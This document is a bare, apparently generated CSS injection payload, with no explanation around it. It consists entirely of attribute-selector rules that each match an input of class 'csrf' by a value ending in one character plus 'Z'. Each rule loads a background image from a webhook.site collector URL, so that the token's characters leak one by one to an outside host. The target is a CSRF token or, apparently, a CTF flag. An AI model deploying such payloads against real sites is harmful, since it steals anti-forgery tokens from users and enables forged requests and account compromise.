input.csrf[value$='aZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=aZ); }
input.csrf[value$='bZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=bZ); }
input.csrf[value$='cZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=cZ); }
input.csrf[value$='dZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=dZ); }
input.csrf[value$='eZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=eZ); }
input.csrf[value$='fZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=fZ); }
input.csrf[value$='gZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=gZ); }
input.csrf[value$='hZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=hZ); }
input.csrf[value$='iZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=iZ); }
input.csrf[value$='jZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=jZ); }
input.csrf[value$='kZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=kZ); }
input.csrf[value$='lZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=lZ); }
input.csrf[value$='mZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=mZ); }
input.csrf[value$='nZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=nZ); }
input.csrf[value$='oZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=oZ); }
input.csrf[value$='pZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=pZ); }
input.csrf[value$='qZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=qZ); }
input.csrf[value$='rZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rZ); }
input.csrf[value$='sZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=sZ); }
input.csrf[value$='tZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=tZ); }
input.csrf[value$='uZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=uZ); }
input.csrf[value$='vZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=vZ); }
input.csrf[value$='wZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=wZ); }
input.csrf[value$='xZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=xZ); }
input.csrf[value$='yZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=yZ); }
input.csrf[value$='zZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=zZ); }
input.csrf[value$='AZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=AZ); }
input.csrf[value$='BZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=BZ); }
input.csrf[value$='CZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=CZ); }
input.csrf[value$='DZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=DZ); }
input.csrf[value$='EZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=EZ); }
input.csrf[value$='FZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=FZ); }
input.csrf[value$='GZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=GZ); }
input.csrf[value$='HZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=HZ); }
input.csrf[value$='IZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=IZ); }
input.csrf[value$='JZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=JZ); }
input.csrf[value$='KZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=KZ); }
input.csrf[value$='LZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=LZ); }
input.csrf[value$='MZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=MZ); }
input.csrf[value$='NZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=NZ); }
input.csrf[value$='OZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=OZ); }
input.csrf[value$='PZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=PZ); }
input.csrf[value$='QZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=QZ); }
input.csrf[value$='RZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=RZ); }
input.csrf[value$='SZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=SZ); }
input.csrf[value$='TZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=TZ); }
input.csrf[value$='UZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=UZ); }
input.csrf[value$='VZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=VZ); }
input.csrf[value$='WZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=WZ); }
input.csrf[value$='XZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=XZ); }
input.csrf[value$='YZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=YZ); }
input.csrf[value$='ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ZZ); }
input.csrf[value$='0Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=0Z); }
input.csrf[value$='1Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=1Z); }
input.csrf[value$='2Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=2Z); }
input.csrf[value$='3Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=3Z); }
input.csrf[value$='4Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=4Z); }
input.csrf[value$='5Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=5Z); }
input.csrf[value$='6Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=6Z); }
input.csrf[value$='7Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=7Z); }
input.csrf[value$='8Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=8Z); }
input.csrf[value$='9Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=9Z); }
input.csrf[value$='²Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=²Z); }
input.csrf[value$='&Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=&Z); }
input.csrf[value$='éZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=éZ); }
input.csrf[value$='~Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=~Z); }
input.csrf[value$='"Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag="Z); }
input.csrf[value$='#Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=#Z); }
input.csrf[value$='{Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag={Z); }
input.csrf[value$='(Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=(Z); }
input.csrf[value$='[Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=[Z); }
input.csrf[value$='-Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=-Z); }
input.csrf[value$='|Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=|Z); }
input.csrf[value$='èZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=èZ); }
input.csrf[value$='`Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=`Z); }
input.csrf[value$='_Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=_Z); }
input.csrf[value$='\Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=\Z); }
input.csrf[value$='çZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=çZ); }
input.csrf[value$='^Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=^Z); }
input.csrf[value$='àZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=àZ); }
input.csrf[value$='@Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=@Z); }
input.csrf[value$=')Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=)Z); }
input.csrf[value$=']Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=]Z); }
input.csrf[value$='=Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag==Z); }
input.csrf[value$='}Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=}Z); }
input.csrf[value$='°Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=°Z); }
input.csrf[value$='/Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=/Z); }
input.csrf[value$='+Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=+Z); }
input.csrf[value$=',Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=,Z); }
input.csrf[value$='?Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=?Z); }
input.csrf[value$=';Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=;Z); }
input.csrf[value$='.Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=.Z); }
input.csrf[value$=':Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=:Z); }
input.csrf[value$='!Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=!Z); }
input.csrf[value$='§Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=§Z); }
input.csrf[value$='%Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=%Z); }
input.csrf[value$='ùZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ùZ); }
input.csrf[value$='*Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=*Z); }
input.csrf[value$='µZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=µZ); }
input.csrf[value$='$Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=$Z); }
input.csrf[value$='£Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=£Z); }
input.csrf[value$='¤Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=¤Z); }
input.csrf[value$='¨Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=¨Z); }
input.csrf[value$=' Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag= Z); }
